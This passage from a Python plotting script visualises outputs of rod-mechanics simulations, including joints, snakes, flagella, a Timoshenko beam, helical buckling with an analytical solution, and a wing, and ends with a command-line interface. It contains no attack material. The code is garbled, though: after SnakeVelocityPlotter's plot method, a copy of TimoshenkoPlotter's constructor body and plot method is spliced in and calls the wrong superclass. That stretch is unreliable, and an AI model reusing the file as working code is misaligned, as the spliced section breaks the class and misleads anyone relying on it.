super(SphericalJointPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n self.ax.set_xlim(-200, 200)\n self.ax.set_ylim(-150, 250)\n self.ax.set_zlim(00, 400)\n # self.ax.set_ylim(-0.125, 0.125)\n # self.ax.set_zlim(-0.2, 0.2)\n set_axes_equal(self.ax)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n super(SphericalJointPlotter, self).plot(ax, data, color, i_seq)\n last_pos = data[0:3, -1] # position\n time = data[4, 0] # time\n scaling = 60.0 # purely for visualization\n\n # Below routine for plotting force as a line, and not arrow\n\n # # After the last possible dynamic update plot\n # if i_seq == 1: # ie. i_seq == len(self.metadata)-1\n # if len(ax.lines) > i_seq + 1: # 2 * i_seq + 2\n # if time > 0.2:\n # f = 1.0 * np.array(\n # [\n # np.cos(0.5 * np.pi * (time - 0.2)),\n # 0.0,\n # np.sin(0.5 * np.pi * (time - 0.2)),\n # ]\n # )\n # else: # time < 0.2, only update in position is needed\n # f = np.array([0.0, 0.0, -2])\n\n # f_with_pos = np.vstack((last_pos, last_pos + scaling * f)).T\n # ax.lines[i_seq + 1]._verts3d = f_with_pos\n # else:\n # f = scaling * np.array([0.0, 0.0, -2])\n # f_with_pos = np.vstack((last_pos, last_pos + f)).T\n # ax.plot(\n # f_with_pos[0, :],\n # f_with_pos[1, :],\n # f_with_pos[2, :],\n # color=\"k\",\n # linewidth=1,\n # )\n\n # After the last possible dynamic update plot\n if i_seq == 1: # ie. i_seq == len(self.metadata)-1\n if ax.artists:\n if time > 0.2:\n f = 1.0 * np.array(\n [\n np.cos(0.5 * np.pi * (time - 0.2)),\n 0.0,\n np.sin(0.5 * np.pi * (time - 0.2)),\n ]\n )\n else: # time < 0.2, only update in position is needed\n f = np.array([0.0, 0.0, -2])\n arrow_end_pos = last_pos + scaling * f\n\n ax.artists[0]._verts3d = np.vstack((last_pos, arrow_end_pos)).T\n else:\n f = np.array([0.0, 0.0, -2])\n arrow_end_pos = last_pos + scaling * f\n a = Arrow3D(\n [last_pos[0], arrow_end_pos[0]],\n [last_pos[1], arrow_end_pos[1]],\n [last_pos[2], arrow_end_pos[2]],\n mutation_scale=10,\n lw=1,\n arrowstyle=\"-|>\",\n color=\"k\",\n )\n ax.add_artist(a)\n\n\nclass HingeJointPlotter(SphericalJointPlotter):\n \"\"\" Plots the trajectory of the slithering sphericalJoint\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n super(HingeJointPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Overrides changes\n self.ax.set_xlim(-200, 200)\n self.ax.set_ylim(-150, 250)\n self.ax.set_zlim(00, 400)\n set_axes_equal(self.ax)\n\n\nclass FixedJointPlotter(SphericalJointPlotter):\n \"\"\" Plots the trajectory of the slithering sphericalJoint\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n super(FixedJointPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # # Overrides changes\n # self.ax.set_xlim(-50, 50)\n # self.ax.set_ylim(-150, 250)\n # self.ax.set_zlim(300, 400)\n # set_axes_equal(self.ax)\n\n\nclass PullingMusclePlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the slithering sphericalJoint\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # Body and wireframe color\n self.file_metadata = [\n # (\"rod1\", \".txt\", (31 / 255, 119 / 255, 180 / 255)),\n (\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\")),\n # (\"rod2\", \".txt\", (200 / 255, 0 / 255, 0 / 255)),\n (\"rod2\", \".txt\", to_rgb(\"xkcd:reddish\")),\n # (\"rod3\", \".txt\", (50 / 255, 200 / 255, 80 / 255)),\n (\"rod3\", \".txt\", to_rgb(\"xkcd:greenish\")),\n ]\n\n super(PullingMusclePlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n self.ax.set_xlim(-50, 50)\n self.ax.set_ylim(-100, 200)\n self.ax.set_zlim(50, 350)\n # self.ax.set_ylim(-0.125, 0.125)\n # self.ax.set_zlim(-0.2, 0.2)\n set_axes_equal(self.ax)\n\n\nclass SnakePlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the slithering snake\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # Body and wireframe color\n self.file_metadata = [(\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(SnakePlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n self.ax.set_xlim(-3, 0.8)\n self.ax.set_ylim(-0.25, 0.25)\n self.ax.set_zlim(-0.05, 0.05)\n set_axes_equal(self.ax)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n super(SnakePlotter, self).plot(ax, data, color, i_seq)\n\n # After the last possible dynamic update plot\n if i_seq == 0: # ie. i_seq == len(self.metadata)-1\n if len(ax.collections) > 2: # 2 * i_seq + 2\n # surfae alrady plotted, why plot it again?\n pass\n else:\n # * unpakcs arguments\n x = np.linspace(*ax.get_xlim(), 7)\n y = np.linspace(*ax.get_ylim(), 7)\n X, Y = np.meshgrid(x, y)\n Z = 0.0 * X\n ax.grid(False)\n ax.plot_wireframe(\n X, Y, Z, rstride=1, cstride=1, color=\"darkgrey\", linewidth=1\n )\n\n # def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255)):\n # \"\"\" Plots snake data\n # \"\"\"\n # super(SnakePlotter, self).plot(ax, data, color)\n\n # # self.ax.set_xlim(0, 0.125)\n # # self.ax.set_ylim(-0.125, 0.125)\n # # self.ax.set_zlim(-0.2, 0.2)\n # set_axes_equal(self.ax)\n\n\nclass HelicalBucklingPlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the slithering snake\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # Body and wireframe color\n self.file_metadata = [(\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(HelicalBucklingPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n # self.ax.set_xlim(-3, 0.8)\n # self.ax.set_ylim(-0.25, 0.25)\n self.ax.set_zlim(-50.0, 50.0)\n set_axes_equal(self.ax)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n super(HelicalBucklingPlotter, self).plot(ax, data, color, i_seq)\n\n\nclass TwoDimensionalPlotter:\n \"\"\" Plot class for classical 2D line plots\"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n\n \"\"\" Figure attributes \"\"\"\n self.fig = plt.figure(figsize=FigProperties.figsize())\n\n if not hasattr(self, \"file_metadata\"):\n # print(\"hi\")\n # if self.file_metadata is None:\n self.file_metadata = [(\"Flagella\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n # Also total number of suplots\n ntypes_files = len(self.file_metadata)\n # Number of rows dependent\n n_rows = 1 if ntypes_files < 4 else 2\n # Number of columns,\n n_columns = ntypes_files // n_rows\n n_columns += ntypes_files % n_rows\n\n # Create a Position index\n pindex = range(1, ntypes_files + 1)\n\n # Create a bunch of axes\n self.axes = [self.fig.add_subplot(n_rows, n_columns, k) for k in pindex]\n\n # Set some common attributes\n for axis in self.axes:\n axis.grid(True)\n # ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n\n \"\"\" Save file attributes \"\"\"\n self.output_folder = output_folder\n self.savefile_name, self.savefile_ext = os.path.splitext(save_file)\n\n # Assume its a pdf if no extension given by default\n if not self.savefile_ext:\n self.savefile_ext = \".pdf\"\n\n \"\"\" Source file attributes and search \"\"\"\n\n # Guaranteed to be sorted\n self.files_to_be_processed = [None for i in range(ntypes_files)]\n for index, (prefix, suffix, _) in enumerate(self.file_metadata):\n temp, _ = detect_files(input_folder, prefix, suffix)\n self.files_to_be_processed[index] = temp.pop()\n\n self.force_flag = force_flag\n self.display_flag = display_flag\n\n print(\"{} initialized\".format(type(self).__name__))\n\n def process(self):\n \"\"\" Loads all data, plots them and stores them into appropriately\n named figures.\n \"\"\"\n\n # Load color metadata first as list of rgb tuples\n colors = [color for (_, _, color) in self.file_metadata]\n\n if self.display_flag:\n # Turn on interactive mode to persist figure\n plt.ion()\n # Show figure after persist\n plt.show()\n\n print(\"Starting processing, press Ctrl+C to quit at any time\")\n print(\"(Maybe more than once)\")\n while True:\n try:\n for i_ax, (src_file, axis, color) in enumerate(\n zip(self.files_to_be_processed, self.axes, colors)\n ):\n # Defaults loads to (ndata, 4) rather than (4,ndata)\n data = np.loadtxt(src_file).T\n self.plot(axis, data, color, i_ax)\n\n # Autoscaling important as we dynamically update now\n axis.relim()\n axis.autoscale_view(True, True, True)\n\n self.fig.canvas.draw()\n\n filename = \"{name}{ext}\".format(\n name=self.savefile_name, ext=self.savefile_ext\n )\n\n self.fig.savefig(\n os.path.join(self.output_folder, filename), dpi=FigProperties.dpi\n )\n\n if self.display_flag:\n # Bigger pause to prevent too much looping\n plt.pause(2.0)\n else:\n pass\n\n except KeyboardInterrupt:\n print(\"Finished processing\")\n raise IOError\n\n # if self.display_flag:\n # # Show only the last drawn figure to the user\n # plt.show()\n\n def plot(self, axis, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots snake data\n \"\"\"\n if axis.lines:\n for line in axis.lines:\n line.set_data(data[0, :], data[1, :])\n else:\n axis.plot(data[0, :], data[1, :], color=color, marker=\"o\", linewidth=2)\n # axis.plot(data[0, :], data[1, :], color=color, marker=\"o\", linewidth=2)\n\n def animate(self):\n \"\"\" Animates using ffmpeg the figures created by savefig\n \"\"\"\n pass\n\n\nclass TimoshenkoPlotter(TwoDimensionalPlotter):\n \"\"\"Plots flagella quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n self.file_metadata = [(\"timoshenko_final_shape\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(TimoshenkoPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"X (m)\")\n self.axes[0].set_ylabel(\"Y (m)\")\n self.axes[0].set_title(\"Centerline deflection\")\n\n print(\"TimoshenkoPlotter initialized!\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots timoshenko data\n \"\"\"\n # Timoshenko data needs correction with the first instant\n ax.plot(\n data[0, :],\n data[1, :],\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"simulation\",\n )\n ax.plot(\n data[3, :],\n data[4, :],\n color=\"k\",\n linestyle=\"dashed\",\n linewidth=2,\n label=\"analytical\",\n )\n ax.legend()\n\n # In this case as soon as we plot, we can exit\n plt.pause(10.0)\n import sys\n\n sys.exit(0)\n\n\nclass ElbowPlotter(TwoDimensionalPlotter):\n \"\"\" Plots the muscle force output of the elbow\n as simulation progresses\n \"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n self.file_metadata = [(\"velocity\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(ElbowPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n\n # Setting labels here\n self.axes[0].set_xlabel(\"T (s)\")\n self.axes[0].set_ylabel(\"Elbow angle (degrees)\")\n self.axes[0].set_title(\"Angle vs T\")\n\n # self.ax.set_xlim(0, 1)\n # self.ax.set_ylim(0, 1)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots elbow data\n \"\"\"\n # Flagella data needs correction with the first instant\n time = data[0, :]\n angle = data[1, :] * 180.0 / np.pi\n # print(time, pos)\n\n if ax.lines:\n for line in ax.lines:\n line.set_data(time, angle)\n else:\n ax.plot(time, angle, color=color, marker=\"o\", linewidth=2)\n\n\n# class SnakeVelocityPlotter(TwoDimensionalPlotter):\n# \"\"\" Plots the muscle force output of the elbow\n# as simulation progresses\n# \"\"\"\n\n# # pylint : disable=too-many-arguments\n# def __init__(\n# self, input_folder, output_folder, save_file, force_flag, display_flag\n# ):\n# # pylint : enable=too-many-arguments\n\n# # self.file_metadata = [(\"velocity\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n# super(SnakeVelocityPlotter, self).__init__(\n# input_folder, output_folder, save_file, force_flag, display_flag\n# )\n\n# # Make any other changes to the figure here\n# # Data-dependent maybe\n\n# # Setting labels here\n# self.axes[0].set_xlabel(\"T (s)\")\n# self.axes[0].set_ylabel(\"Velocity (m/s)\")\n# self.axes[0].set_title(\"Velocity vs T\")\n\n# # self.ax.set_xlim(0, 1)\n# # self.ax.set_ylim(0, 1)\n\n# def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n# \"\"\" Plots muscularsnake data\n# \"\"\"\n# # Muscularsnake data plotted from the second instant\n# # The first instant is just the initialization which is\n# # discarded to give time for the structure to relax (ie contact etc.)\n\n# # Muscularsnake data plotted with reference to the second instant\n# # The first is initial time\n# time = data[0, :]\n# x_velocity = data[3, :]\n# y_velocity = data[4, :]\n\n# velocity_dir = np.array([-2.385, -0.089])\n# velocity_dir /= norm(velocity_dir)\n\n# fwd_velocity = x_velocity * velocity_dir[0] + y_velocity * velocity_dir[1]\n\n# binorm = np.array([0.089, -2.385])\n# binorm /= norm(binorm)\n\n# lat_velocity = x_velocity * binorm[0] + y_velocity * binorm[1]\n# mag_vel_new = fwd_velocity**2 + lat_velocity**2\n# mag_vel_orig = x_velocity**2 + y_velocity**2\n\n# if ax.lines:\n# ax.lines[0].set_data(time, -fwd_velocity)\n# ax.lines[1].set_data(time, lat_velocity)\n# # ax.lines[0].set_data(time, mag_vel_orig)\n# # ax.lines[1].set_data(time, mag_vel_new)\n# else:\n# ax.plot(\n# time,\n# fwd_velocity,\n# color=color,\n# marker=\"o\",\n# linewidth=2,\n# label=\"forward\",\n# )\n# ax.plot(\n# time,\n# lat_velocity,\n# # color=\"xkcd : deep red\",\n# # c=\"xkcd: deep red\",\n# c = 'k',\n# marker=\"o\",\n# linewidth=2,\n# label=\"lateral\",\n# )\n# ax.legend()\n\n\nclass FlagellaPlotter(TwoDimensionalPlotter):\n \"\"\"Plots flagella quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n super(FlagellaPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n\n # Setting labels here\n self.axes[0].set_xlabel(\"Time (s)\")\n self.axes[0].set_ylabel(\"Position (micrometer)\")\n self.axes[0].set_title(\"x CoM position vs Time\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots flagella data\n \"\"\"\n # Flagella data needs correction with the first instant\n time = data[0, :]\n pos = data[1, :] - data[1, 0]\n # print(time, pos)\n\n if ax.lines:\n for line in ax.lines:\n line.set_data(time, -1000.0 * pos)\n else:\n ax.plot(time, -1000 * pos, color=color, marker=\"o\", linewidth=2)\n\n\nclass WalkerPlotter(TwoDimensionalPlotter):\n \"\"\"Plots flagella quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n super(WalkerPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n\n # Setting labels here\n self.axes[0].set_xlabel(\"Time (s)\")\n self.axes[0].set_ylabel(\"Displacement (millimeter)\")\n self.axes[0].set_title(\"Displacement vs Time\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots walker data\n \"\"\"\n # Walker data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Walker data plotted with reference to the second instant\n # The first is initial time\n time = data[0, 1:]\n pos = data[1, 1:] - data[1, 1]\n\n if ax.lines:\n for line in ax.lines:\n line.set_data(time, -pos)\n else:\n # - in pos to correct for direction\n ax.plot(time, -pos, color=color, marker=\"o\", linewidth=2)\n\n\nclass SnakeVelocityPlotter(TwoDimensionalPlotter):\n \"\"\"Plots snake quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n super(SnakeVelocityPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"T\")\n self.axes[0].set_ylabel(\"V (m/s)\")\n self.axes[0].set_title(\"Velocity vs T\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots muscularsnake data\n \"\"\"\n # Muscularsnake data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Muscularsnake data plotted with reference to the second instant\n # The first is initial time\n time = data[0, :]\n fwd_velocity = data[3, :]\n lat_velocity = data[4, :]\n\n if ax.lines:\n ax.lines[0].set_data(time, fwd_velocity)\n ax.lines[1].set_data(time, lat_velocity)\n else:\n ax.plot(\n time,\n fwd_velocity,\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"forward\",\n )\n ax.plot(\n time,\n lat_velocity,\n c=\"xkcd:reddish\",\n marker=\"o\",\n linewidth=2,\n label=\"lateral\",\n )\n ax.legend()\n\n self.file_metadata = [(\"timoshenko_final_shape\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(TimoshenkoPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"X (m)\")\n self.axes[0].set_ylabel(\"Y (m)\")\n self.axes[0].set_title(\"Centerline deflection\")\n\n print(\"TimoshenkoPlotter initialized!\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots timoshenko data\n \"\"\"\n # Timoshenko data needs correction with the first instant\n ax.plot(\n data[0, :],\n data[1, :],\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"simulation\",\n )\n ax.plot(\n data[3, :],\n data[4, :],\n color=\"k\",\n linestyle=\"dashed\",\n linewidth=2,\n label=\"analytical\",\n )\n ax.legend()\n\n # In this case as soon as we plot, we can exit\n plt.pause(10.0)\n import sys\n\n sys.exit(0)\n\n\nclass HelicalPhiPlotter(TwoDimensionalPlotter):\n \"\"\"Plots helical phi \"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n self.file_metadata = [(\"helix_0100_shape\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(HelicalPhiPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n # length of rod\n self.L = 100.0\n\n # Setting labels here\n self.axes[0].set_xlabel(\"s - L/2\")\n self.axes[0].set_ylabel(\"phi\")\n self.axes[0].set_title(\"phi vs s\")\n\n def envelope(self, arg_pos):\n \"\"\"\n Given points, computes the arc length and envelope of the curve\n \"\"\"\n n_points = arg_pos.shape[1]\n\n # Computes the direction in which the rod points\n # in our cases it should be the z-axis\n rod_direction = arg_pos[:, -1] - arg_pos[:, 0]\n rod_direction /= norm(rod_direction, ord=2, axis=0)\n\n # Compute local tangent directions\n tangent_s = np.diff(arg_pos, n=1, axis=-1) # x_(i+1)-x(i)\n length_s = norm(tangent_s, ord=2, axis=0)\n tangent_s /= length_s\n\n # Dot product with direction is cos_phi, see RSOS\n cos_phi_s = np.einsum(\"ij,i->j\", tangent_s, rod_direction)\n\n # Compute phi-max now\n phi = np.arccos(cos_phi_s)\n cos_phi_max = np.cos(np.max(phi))\n\n # Return envelope and arclength\n envelope = (cos_phi_s - cos_phi_max) / (1.0 - cos_phi_max)\n # -0.5 * length accounts for the element/node business\n arclength = np.cumsum(length_s) - 0.5 * length_s[0]\n\n return arclength, envelope\n\n def analytical_solution(self):\n \"\"\" Gives the analytical solution of the helicalbuckling case\n \"\"\"\n # Physical parameters, set from the simulation\n B = 1.345\n C = 0.789\n gamma = C / B\n R = 27.0 * 2.0 * np.pi\n d = 0.03\n D = d * self.L\n nu = 1.0 / gamma - 1.0\n\n # These are magic constants, but you can obtain them by solving\n # this equation (accoring to matlab syntax)\n # syms x y\n # S = vpasolve([d == sqrt(16/y*(1-x*x/(4*y))), R == x/gamma+4*acos(x/(2*sqrt(y)))], [x, y]);\n # moment = double(S.x); # dimensionless end moment\n # tension = double(S.y); # dimensionless end torque\n # This comes from Eqs. 14-15 of \"Writhing instabilities of twisted rods: from\n # infinite to finite length\", 2001\n # We did not want to introduce sympy dependency here, so we decided to hardcode\n # the solutions instead\n moment = 98.541496171190744\n tension = 2.900993205792131e3\n\n # Compute maximum envelope angle according to Eq. 13 of \"Writhing\n # instabilities of twisted rods: from infinite to finite length\", 2001\n thetaMax = np.arccos(moment * moment / (2.0 * tension) - 1.0)\n\n # Compute actual end torque and tension according to \"Writhing\n # instabilities of twisted rods: from infinite to finite length\", 2001\n M = moment * B / self.L\n T = tension * B / (self.L * self.L)\n\n # Compute dimensionless load according to Eq. 30 of \"Helical and localised\n # buckling in twisted rods: a unified analysis of the symmetric case\", 2000\n m = M / np.sqrt(B * T)\n\n # Setup for analytical curve calculation\n s = np.linspace(-0.5, 0.5, 10000)\n t = T * self.L * self.L / (4 * np.pi * np.pi * B)\n mz = M * self.L / (2 * np.pi * B)\n root = np.sqrt(4 * t - mz * mz)\n\n # This is the analytical curve computed\n # according to Eqs. 27 and 52 of\n # \"Instability and self-contact phenomena in the writhing of clamped rods\",\n # 2003\n xs = (\n 1.0\n / (2.0 * np.pi * t)\n * root\n * np.sin(mz * np.pi * s)\n / np.cosh(np.pi * s * root)\n )\n ys = (\n -1.0\n / (2.0 * np.pi * t)\n * root\n * np.cos(mz * np.pi * s)\n / np.cosh(np.pi * s * root)\n )\n zs = s - 1.0 / (2.0 * np.pi * t) * root * np.tanh(np.pi * s * root)\n pos = np.vstack((xs, ys, zs)) * self.L\n return self.envelope(pos)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots muscularsnake data\n \"\"\"\n # Muscularsnake data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Muscularsnake data plotted with reference to the second instant\n # The first is initial time\n if ax.lines:\n pass\n else:\n analytical_centerline, analytical_envelope = self.analytical_solution()\n num_centerline, num_envelope = self.envelope(data)\n\n ax.plot(\n num_centerline - 0.5 * self.L,\n num_envelope,\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"numerical\",\n )\n ax.plot(\n analytical_centerline - 0.5 * self.L,\n analytical_envelope,\n c=\"black\",\n linestyle=\"--\",\n linewidth=1,\n label=\"analytical\",\n )\n ax.legend()\n\n\nclass WingPlotter(TwoDimensionalPlotter):\n \"\"\"Plots wing quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n super(WingPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"T (s)\")\n self.axes[0].set_ylabel(\"Angle (degrees)\")\n self.axes[0].set_title(\"Angle vs T\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots wing data\n \"\"\"\n # Wing data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Wing data plotted with reference to the second instant\n # The first is initial time\n time = (data[0, 1:] - 0.125) / (\n 0.38\n ) # Accounts for initialization time and period\n dv_angle = data[1, 1:] # dorsoventral\n ap_angle = data[2, 1:] # anterio-posterior\n elb_angle = data[3, 1:] # elbow-angle\n\n if ax.lines:\n ax.lines[0].set_data(time, dv_angle)\n ax.lines[1].set_data(time, ap_angle)\n ax.lines[2].set_data(time, elb_angle)\n else:\n ax.plot(\n time,\n dv_angle,\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"dorsoventral\",\n )\n ax.plot(\n time,\n ap_angle,\n color=\"xkcd:reddish\",\n marker=\"o\",\n linewidth=2,\n label=\"anterio-posterior\",\n )\n ax.plot(\n time,\n elb_angle,\n color=\"xkcd:greenish\",\n marker=\"o\",\n linewidth=2,\n label=\"elbow\",\n )\n ax.legend()\n\n\ndef parse_args(args=None):\n \"\"\"Parse arguments from commandline\"\"\"\n parser = argparse.ArgumentParser(\n description=sys.modules[__name__].__doc__, formatter_class=CustomFormatter\n )\n\n parser.add_argument(\n \"-c\",\n \"--case\",\n choices=[\n \"timoshenkobeam\",\n \"helicalbuckling\",\n \"sphericaljoint\",\n \"hingejoint\",\n \"fixedjoint\",\n \"pullingmuscle\",\n \"snake\",\n \"elbow\",\n \"flagella\",\n \"walker\",\n \"muscularsnake\",\n \"wing\",\n ],\n help=\"simulation case whose output needs to be seen\",\n type=str,\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n metavar=\"OUTFILE\",\n help=\"if enabled, stores the images as OUTFILE_{1,2,...,N}.pdf,\\\n in the scripts/pyprocessed_ directory\",\n default=\"out\",\n type=str,\n )\n\n parser.add_argument(\n \"-p\",\n \"--path\",\n metavar=\"OUTPATH\",\n help=\"path to store output files, is default created to\\\n pyprocessed_case if not initialized\",\n default=\"./pyprocessed\",\n type=str,\n )\n\n parser.add_argument(\n \"-f\",\n \"--force\",\n help=\"force rewrite of any previously saved images\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-a\",\n \"--animate\",\n help=\"force collate pngs (ffmpeg) after saving them\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--nodisp\",\n help=\"do not render images on the screen but only save (faster!)\",\n action=\"store_true\",\n )\n\n if len(args) < 2:\n parser.print_help()\n sys.exit(42)\n\n return parser.parse_args(args)\n\n\ndef find_results(folder_name):\n \"\"\" Given a folder name, traverse the current dir to find the folder,if not\n found travel its parent, and so on until root.\n Credits: https://stackoverflow.com/a/37560251\n \"\"\"\n cur_dir = os.getcwd()\n\n while True:\n parent_dir = os.path.dirname(cur_dir)\n test_dir = os.path.join(cur_dir, folder_name)\n #\n if os.path.isdir(test_dir): # pylint : disable=no-else-return\n return test_dir\n else:\n if cur_dir == parent_dir: # if dir is root dir\n raise FileNotFoundError(\"Folder {} not found\".format(folder_name))\n else:\n cur_dir = parent_dir\n\n\ndef main(argv):\n \"\"\" main function coordinating output\n \"\"\"\n\n \"\"\"Parse opts\"\"\"\n options = parse_args(argv)\n\n case_name = options.case\n output_file = options.output\n output_folder = options.path\n force_flag = options.force\n animate_flag = options.animate\n display_flag = not options.nodisp\n\n \"\"\"Process flags\"\"\"\n input_folder = find_results(\"run_\" + case_name)\n\n output_folder = os.path.abspath(os.path.join(output_folder, case_name))\n # Lazy to implement version safe code\n os.makedirs(output_folder, exist_ok=True)\n\n tre_d_plotter = None\n two_d_plotter = None\n\n two_display_flag = display_flag\n three_display_flag = display_flag\n\n \"\"\"Decide and process\"\"\"\n if case_name == \"timoshenkobeam\":\n two_d_plotter = TimoshenkoPlotter\n elif case_name == \"helicalbuckling\":\n two_d_plotter = HelicalPhiPlotter\n tre_d_plotter = HelicalBucklingPlotter\n elif case_name == \"elbow\":\n two_d_plotter = ElbowPlotter\n elif case_name == \"flagella\":\n two_d_plotter = FlagellaPlotter\n elif case_name == \"walker\":\n two_d_plotter = WalkerPlotter\n elif case_name == \"muscularsnake\":\n two_d_plotter = SnakeVelocityPlotter\n elif case_name == \"wing\":\n two_d_plotter = WingPlotter\n elif case_name == \"sphericaljoint\":\n tre_d_plotter = SphericalJointPlotter\n elif case_name == \"hingejoint\":\n tre_d_plotter = HingeJointPlotter\n elif case_name == \"fixedjoint\":\n tre_d_plotter = FixedJointPlotter\n elif case_name == \"pullingmuscle\":\n tre_d_plotter = PullingMusclePlotter\n elif case_name == \"snake\":\n two_d_plotter = SnakeVelocityPlotter\n tre_d_plotter = SnakePlotter\n\n if tre_d_plotter is None:\n tre_d_plotter = DummyPlotter\n three_display_flag = False\n if two_d_plotter is None:\n two_d_plotter = DummyPlotter\n two_display_flag = False\n\n # Order important 